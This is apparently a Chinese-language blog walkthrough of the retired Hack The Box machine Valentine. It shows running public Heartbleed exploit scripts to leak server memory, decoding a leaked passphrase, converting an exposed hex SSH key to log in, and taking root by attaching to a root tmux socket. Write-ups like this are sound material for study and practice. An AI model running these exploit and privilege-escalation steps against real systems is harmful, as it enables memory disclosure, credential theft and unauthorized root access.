1. 程式人生 > 實用技巧 >HTB-靶機-Valentine

HTB-靶機-Valentine

本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切後果與發表本文章的作者無關

靶機是作者購買VIP使用退役靶機操作,顯示IP地址為10.10.10.79

本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描

執行命令autorecon 10.10.10.79 -o ./Valentine-autorecon

開放了3個埠,先訪問443埠看看

看影象是存在心臟出血漏洞,漏洞詳情可以參考:https://zh.m.wikipedia.org/zh-hans/%E5%BF%83%E8%84%8F%E5%87%BA%E8%A1%80%E6%BC%8F%E6%B4%9E

針對可以直接拿poc測試可以快速確認是否真的存在,也可以使用nmap的心臟漏洞掃描指令碼進行掃描確認,我這裡給出3個exploit,具體如下:

心臟出血漏洞,通過在kali中搜索searchsploit heartbleed
可獲得可利用exploit 32745.py 和 32764.py 這兩個exploit執行的結果一樣,但是需要每次手動執行

不停的執行如下命令:
python 32745.py 10.10.10.79 | grep -v "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

指定執行次數,不停地執行心臟出血漏洞,以發現重要敏感資訊為準
https:
//github.com/sensepost/heartbleed-poc/blob/master/heartbleed-poc.py 執行如下命令: python heartbleed-poc.py 10.10.10.79 -n 150 -f heartdumbin.txt 然後使用strings命令查詢heartdumbin.txt 發現如下敏感資訊 $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== 上述解碼後資訊 echo -n "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d heartbleedbelievethehype

得到base64編碼的值然後解碼即可,通過目錄爆破發現如下目錄資訊

訪問dev目錄

得到上面資訊,根據其中一個檔案的提示,得知是需要先得到上面的解碼資訊,然後16進位制金鑰轉換即可,這裡提下上面訪問的兩個檔案使用80或者443埠都可以正常訪問,我這裡就直接使用curl命令加-O引數下載此檔案到本地kali然後使用xxd命令進行解碼

將其此檔案重定向到id_rsa檔案裡面然後給600許可權遠端ssh登入到目標靶機

登入目標靶機

使用ps -ef命令檢視當前程序

發現已經有使用tmux命令開啟的root程序會話,直接切換至此root會話即可提權

tmux -S /.devs/dev_sess